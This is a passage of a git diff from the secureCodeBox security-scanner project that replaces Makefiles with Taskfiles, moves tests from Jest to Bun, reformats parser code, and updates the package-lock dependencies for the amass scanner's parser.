%s", crash_on_failed_validation); + const crash_on_failed_validation = + process.env["CRASH_ON_FAILED_VALIDATION"] === "true"; + console.log( + "Validating Findings. Environment variable CRASH_ON_FAILED_VALIDATION is set to %s", + crash_on_failed_validation, + ); try { await validate(findingsWithMetadata); - console.log("The Findings were successfully validated") + console.log("The Findings were successfully validated"); } catch (error) { console.error("The Findings Validation failed with error(s):"); console.error(error); @@ -179,15 +215,9 @@ async function main() { console.log(`Uploading results to the file storage service`); - await uploadResultToFileStorageService( - resultUploadUrl, - findingsWithMetadata - ); + await uploadResultToFileStorageService(resultUploadUrl, findingsWithMetadata); console.log(`Completed parser`); } main(); - -module.exports.addIdsAndDates = addIdsAndDates; -module.exports.addScanMetadata = addScanMetadata; diff --git a/scanners/Makefile b/scanners/Makefile deleted file mode 100644 index d671dadc69..0000000000 --- a/scanners/Makefile +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include ../prerequisites.mk - -.PHONY: integration-tests -integration-tests: - for dir in $(wildcard */.); do \ - $(MAKE) integration-tests -C $$dir;\ - done - -.PHONY: unit-tests -unit-tests: - for dir in $(wildcard */.); do \ - $(MAKE) unit-tests -C $$dir;\ - done - -.PHONY: helm-unit-tests -helm-unit-tests: - set -e; \ - for directory in ./*; do \ - if [ -d "$$directory" ]; then \ - dir_name=$$(basename "$$directory"); \ - if [ "$$dir_name" != "coverage" ] && [ "$$dir_name" != "node_modules" ] && [ "$$dir_name" != "__snapshots__" ] && [ "$$dir_name" != "__testFiles__" ]; then \ - helm unittest "$$directory"; \ - fi; \ - fi; \ - done diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml new file mode 100644 index 0000000000..24f21e5397 --- /dev/null +++ b/scanners/Taskfile.yaml @@ -0,0 +1,159 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + demo-targets: + taskfile: ../demo-targets/Taskfile.yaml + internal: true + core: + taskfile: ../Taskfile.yaml + internal: true + +vars: + # if the scanner uses a custom scanner container image which needs to be built. Usually false as we prefer to reference the official scanner container images + hasCustomScanner: + sh: 'if [ -d "{{ .TASKFILE_DIR }}/{{ .scannerName }}/scanner/" ]; then echo "true"; else echo "false"; fi' + parserUsesNpmDependencies: + sh: 'if [ -f "{{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/package.json" ]; then echo "true"; else echo "false"; fi' + # addtional cli args to pass to the helm install command which installs the scanner into the testing environment + additionalHelmInstallArgsForScanner: '{{ .additionalHelmInstallArgsForScanner | default "" }}' +env: + IMG_TAG: + sh: 'echo "sha-$(git rev-parse --short HEAD)"' + +tasks: + build: + desc: Build the Docker image for the {{ .scannerName }} scanner + status: + - docker images | grep -q "docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG}" || false + - docker images | grep -q "docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG}" || false + preconditions: + - msg: "Docker is not running, please start Docker first" + sh: "docker info >/dev/null 2>&1 || false" + deps: + - core:build-parser-sdk-image + cmds: + - | + {{ if eq "true" .hasCustomScanner -}} + echo "Building custom scanner image for {{ .scannerName }} with tag ${IMG_TAG}" + docker build -t docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} \ + --build-arg=scannerVersion=$(yq eval .appVersion {{ .TASKFILE_DIR }}/{{ .scannerName }}/Chart.yaml) \ + --build-arg=baseImageTag=${IMG_TAG} \ + {{ .TASKFILE_DIR }}/{{ .scannerName }}/scanner/ + kind load docker-image --name testing-env docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} + {{ else -}} + echo "No custom scanner image defined, assuming scanner doen't need to be build" + {{ end -}} + - | + echo "Building parser image for {{ .scannerName }} with tag ${IMG_TAG}" + docker build -t docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} \ + --build-arg=baseImageTag=${IMG_TAG} \ + {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/ + kind load docker-image --name testing-env docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} + predeploy: + desc: Can be overwritten by the scanner to perform any pre-deployment steps + cmds: [] + silent: true + deploy: + desc: Deploy the {{ .scannerName }} scanner to the testing environment + status: + - helm ls {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false + cmds: + - task: core:prepare-testing-env + - task: build + - 'echo "Deploying {{ .scannerName }} to the testing environment"' + - task: predeploy + - | + helm upgrade --install {{ .scannerName }} {{ .TASKFILE_DIR }}/{{ .scannerName }} --namespace integration-tests \ + {{ if eq "true" .hasCustomScanner -}} + --set="scanner.image.tag=${IMG_TAG}" \ + --set="scanner.image.pullPolicy=Never" \ + {{ end -}} + {{ if ne "" .additionalHelmInstallArgsForScanner -}} + {{ .additionalHelmInstallArgsForScanner -}} + {{ end -}} + --set="parser.image.tag=${IMG_TAG}" \ + --set="parser.image.pullPolicy=Never" \ + --wait + + # test:setup tasks + test:setup:parser-sdk: + internal: true + status: + - "[ -d {{ .TASKFILE_DIR }}/../parser-sdk/nodejs/node_modules ] || false" + cmds: + - cd {{ .TASKFILE_DIR }}/../parser-sdk/nodejs/ && bun install + test:setup:scanner-dir: + internal: true + status: + - "[ -d {{ .TASKFILE_DIR }}/node_modules ] || false" + cmds: + - cd {{ .TASKFILE_DIR }}/ && bun install + test:setup:test-helpers: + internal: true + status: + - "[ -d {{ .TASKFILE_DIR }}/../tests/integration/node_modules ] || false" + cmds: + - cd {{ .TASKFILE_DIR }}/../tests/integration && bun install + test:setup:parser-deps: + internal: true + status: + - '{{ if eq "true" .parserUsesNpmDependencies -}}[ -d {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/node_modules ] || false{{ else -}}true{{ end -}}' + cmds: + - cd {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/ && bun install + test:setup: + cmds: + - task: test:setup:parser-sdk + - task: test:setup:scanner-dir + - task: test:setup:test-helpers + - task: test:setup:parser-deps + + test:unit: + desc: Run unit tests for the {{ .scannerName }} scanner + deps: + - test:setup + cmds: + - | + echo "Running integration tests for {{ .scannerName }}" + bun test {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/ + test:integration: + desc: Run integration tests for the {{ .scannerName }} scanner + deps: + - test:setup + - deploy + preconditions: + - msg: "kind cluster is not running, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl config get-contexts | grep -q 'kind-testing-env' || false" + - msg: "secureCodeBox operator is not deployed, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl get pods -n securecodebox-system | grep -q 'securecodebox-operator' || false" + - msg: "{{ .scannerName }} scan type is not deployed, run 'task build deploy' from scanner dir first" + sh: "helm -n integration-tests ls | grep -q '{{ .scannerName }}' || false" + cmds: + # Workaround for https://github.com/oven-sh/bun/issues/7332 + - 'echo "Forwarding the Kubernetes API to localhost"' + - kubectl proxy >/dev/null 2>&1 & + - sleep 1 # Wait a bit to ensure the proxy is up + + - defer: | + # kill pid with command "kubectl proxy" + echo "Killing kubectl proxy" + pkill -f "kubectl proxy" + + - echo "Running integration tests for {{ .scannerName }}" + - bun test {{ .TASKFILE_DIR }}/{{ .scannerName }}/integration-tests/ + test:helm: + desc: Run helm tests for the {{ .scannerName }} scanner + preconditions: + - msg: "Helm unittest plugin is not installed, you need to install it first. See: https://github.com/helm-unittest/helm-unittest/" + sh: "helm plugin list | grep -q 'unittest' || false" + cmds: + - helm unittest {{ .TASKFILE_DIR }}/{{ .scannerName }} + test: + desc: Run all tests for the {{ .scannerName }} scanner + cmds: + - task test:unit + - task test:helm + - task test:integration diff --git a/scanners/amass/Makefile b/scanners/amass/Makefile deleted file mode 100644 index c9cc98bb7f..0000000000 --- a/scanners/amass/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = amass -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/amass/Taskfile.yaml b/scanners/amass/Taskfile.yaml new file mode 100644 index 0000000000..20028cca46 --- /dev/null +++ b/scanners/amass/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: amass + +tasks: {} diff --git a/scanners/amass/integration-tests/amass.test.js b/scanners/amass/integration-tests/amass.test.js index ce59c17276..4daff8b722 100644 --- a/scanners/amass/integration-tests/amass.test.js +++ b/scanners/amass/integration-tests/amass.test.js @@ -2,8 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "amass should find at least 20 subdomains", @@ -12,9 +11,11 @@ test( "amass-scanner-dummy-scan", "amass", ["-norecursive", "-timeout", "1", "-d", "owasp.org"], - 180 + 180, ); - expect(count).toBeGreaterThanOrEqual(100); // The scan is passive, so we can expect a lot of subdomains + expect(count).toBeGreaterThanOrEqual(20); // The scan is passive, so we can expect a lot of subdomains + }, + { + timeout: 10 * 60 * 1000, }, - 10 * 60 * 1000 ); diff --git a/scanners/amass/parser/Dockerfile b/scanners/amass/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/amass/parser/Dockerfile +++ b/scanners/amass/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/amass/parser/package-lock.json b/scanners/amass/parser/package-lock.json index e007533934..aeae45de77 100644 --- a/scanners/amass/parser/package-lock.json +++ b/scanners/amass/parser/package-lock.json @@ -9,7 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "sqlite3": "^5.1.6" + "sqlite3": "^5.1.7" }, "devDependencies": {} }, @@ -19,25 +19,6 @@ "integrity": "sha512-k2Ty1JcVojjJFwrg/ThKi2ujJ7XNLYaFGNB/bWT9wGR+oSMJHMa5w+CUq6p/pVrKeNNgA7pCqEcjSnHVoqJQFw==", "optional": true }, - "node_modules/@mapbox/node-pre-gyp": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/@mapbox/node-pre-gyp/-/node-pre-gyp-1.0.11.tgz", - "integrity": "sha512-Yhlar6v9WQgUp/He7BdgzOz8lqMQ8sU+jkCq7Wx8Myc5YFJLbEe7lgui/V7G1qB1DJykHSGwreceSaD60Y0PUQ==", - "dependencies": { - "detect-libc": "^2.0.0", - "https-proxy-agent": "^5.0.0", - "make-dir": "^3.1.0", - "node-fetch": "^2.6.7", - "nopt": "^5.0.0", - "npmlog": "^5.0.1", - "rimraf": "^3.0.2", - "semver": "^7.3.5", - "tar": "^6.1.11" - }, - "bin": { - "node-pre-gyp": "bin/node-pre-gyp" - } - }, "node_modules/@npmcli/fs": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/@npmcli/fs/-/fs-1.1.1.tgz", @@ -74,12 +55,14 @@ "node_modules/abbrev": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-1.1.1.tgz", - "integrity": "sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==" + "integrity": "sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==", + "optional": true }, "node_modules/agent-base": { "version": "6.0.2", "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "optional": true, "dependencies": { "debug": "4" }, @@ -116,6 +99,7 @@ "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "optional": true, "engines": { "node": ">=8" } @@ -123,34 +107,90 @@ "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", - "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==" - }, - "node_modules/are-we-there-yet": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-2.0.0.tgz", - "integrity": "sha512-Ci/qENmwHnsYo9xKIcUJN5LeDKdJ6R1Z1j9V/J5wyq8nh/mYPEpIKJbBZXtZjG04HiK7zV/p6Vs9952MrMeUIw==", - "dependencies": { - "delegates": "^1.0.0", - "readable-stream": "^3.6.0" - }, - "engines": { - "node": ">=10" - } + "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", + "optional": true }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "optional": true + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT" + }, + "node_modules/bindings": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/bindings/-/bindings-1.5.0.tgz", + "integrity": "sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ==", + "license": "MIT", + "dependencies": { + "file-uri-to-path": "1.0.0" + } + }, + "node_modules/bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "license": "MIT", + "dependencies": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } }, "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", + "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", + "license": "MIT", + "optional": true, "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, + "node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, "node_modules/cacache": { "version": "15.3.0", "resolved": "https://registry.npmjs.org/cacache/-/cacache-15.3.0.tgz", @@ -201,6 +241,7 @@ "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", + "optional": true, "bin": { "color-support": "bin.js" } @@ -208,17 +249,20 @@ "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "optional": true }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", - "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==" + "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", + "optional": true }, "node_modules/debug": { "version": "4.3.4", "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "optional": true, "dependencies": { "ms": "2.1.2" }, @@ -231,15 +275,41 @@ } } }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "license": "MIT", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/deep-extend": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/deep-extend/-/deep-extend-0.6.0.tgz", + "integrity": "sha512-LOHxIOaPYdHlJRtCQfDIVZtfw/ufM8+rVj649RIHzcm/vGwQRXFt6OPqIFWsm2XEMrNIEtWR64sY1LEKD2vAOA==", + "license": "MIT", + "engines": { + "node": ">=4.0.0" + } + }, "node_modules/delegates": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz", - "integrity": "sha512-bd2L678uiWATM6m5Z1VzNCErI3jiGzt6HGY8OVICs40JQq/HALfbyNJmp0UDakEY4pMMaN0Ly5om/B1VI/+xfQ==" + "integrity": "sha512-bd2L678uiWATM6m5Z1VzNCErI3jiGzt6HGY8OVICs40JQq/HALfbyNJmp0UDakEY4pMMaN0Ly5om/B1VI/+xfQ==", + "optional": true }, "node_modules/detect-libc": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.0.2.tgz", - "integrity": "sha512-UX6sGumvvqSaXgdKGUsgZWqcUyIXZ/vZTrlRT/iobiKhGL0zL4d3osHj3uqllWJK+i+sixDS/3COVEOFbupFyw==", + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.0.4.tgz", + "integrity": "sha512-3UDv+G9CsCKO1WKMGw9fwq/SWJYbI0c5Y7LU1AXYoDdbhE2AHQ6N6Nb34sG8Fj7T5APy8qXDCKuuIHd1BR0tVA==", + "license": "Apache-2.0", "engines": { "node": ">=8" } @@ -247,7 +317,8 @@ "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "optional": true }, "node_modules/encoding": { "version": "0.1.13", @@ -258,6 +329,15 @@ "iconv-lite": "^0.6.2" } }, + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "license": "MIT", + "dependencies": { + "once": "^1.4.0" + } + }, "node_modules/env-paths": { "version": "2.2.1", "resolved": "https://registry.npmjs.org/env-paths/-/env-paths-2.2.1.tgz", @@ -273,6 +353,27 @@ "integrity": "sha512-2bmlRpNKBxT/CRmPOlyISQpNj+qSeYvcym/uT0Jx2bMOlKLtSy1ZmLuVxSEKKyor/N5yhvp/ZiG1oE3DEYMSFA==", "optional": true }, + "node_modules/expand-template": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/expand-template/-/expand-template-2.0.3.tgz", + "integrity": "sha512-XYfuKMvj4O35f/pOXLObndIRvyQ+/+6AhODh+OKWj9S9498pHHn/IMszH+gt0fBCRWMNfk1ZSp5x3AifmnI2vg==", + "license": "(MIT OR WTFPL)", + "engines": { + "node": ">=6" + } + }, + "node_modules/file-uri-to-path": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz", + "integrity": "sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw==", + "license": "MIT" + }, + "node_modules/fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==", + "license": "MIT" + }, "node_modules/fs-minipass": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", @@ -287,31 +388,20 @@ "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "optional": true }, - "node_modules/gauge": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/gauge/-/gauge-3.0.2.tgz", - "integrity": "sha512-+5J6MS/5XksCuXq++uFRsnUd7Ovu1XenbeuIuNRJxYWjgQbPuFhT14lAvsWfqfAmnwluf1OwMjz39HjfLPci0Q==", - "dependencies": { - "aproba": "^1.0.3 || ^2.0.0", - "color-support": "^1.1.2", - "console-control-strings": "^1.0.0", - "has-unicode": "^2.0.1", - "object-assign": "^4.1.1", - "signal-exit": "^3.0.0", - "string-width": "^4.2.3", - "strip-ansi": "^6.0.1", - "wide-align": "^1.1.2" - }, - "engines": { - "node": ">=10" - } + "node_modules/github-from-package": { + "version": "0.0.0", + "resolved": "https://registry.npmjs.org/github-from-package/-/github-from-package-0.0.0.tgz", + "integrity": "sha512-SyHy3T1v2NUXn29OsWdxmK6RwHD+vkj3v8en8AOBZ1wBQ/hCAQ5bAQTD02kW4W9tUp/3Qh6J8r9EvntiyCmOOw==", + "license": "MIT" }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "optional": true, "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", @@ -336,7 +426,8 @@ "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", - "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==" + "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", + "optional": true }, "node_modules/http-cache-semantics": { "version": "4.1.1", @@ -362,6 +453,7 @@ "version": "5.0.1", "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "optional": true, "dependencies": { "agent-base": "6", "debug": "4" @@ -391,6 +483,26 @@ "node": ">=0.10.0" } }, + "node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "BSD-3-Clause" + }, "node_modules/imurmurhash": { "version": "0.1.4", "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", @@ -419,6 +531,7 @@ "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "optional": true, "dependencies": { "once": "^1.3.0", "wrappy": "1" @@ -429,16 +542,31 @@ "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, - "node_modules/ip": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/ip/-/ip-2.0.1.tgz", - "integrity": "sha512-lJUL9imLTNi1ZfXT+DU6rBBdbiKGBuay9B6xGSPVjUeQwaH1RIGqef8RZkUtHioLmSNpPR5M4HVKJGm1j8FWVQ==", - "optional": true + "node_modules/ini": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", + "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==", + "license": "ISC" + }, + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", + "optional": true, + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "optional": true, "engines": { "node": ">=8" } @@ -455,6 +583,13 @@ "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", 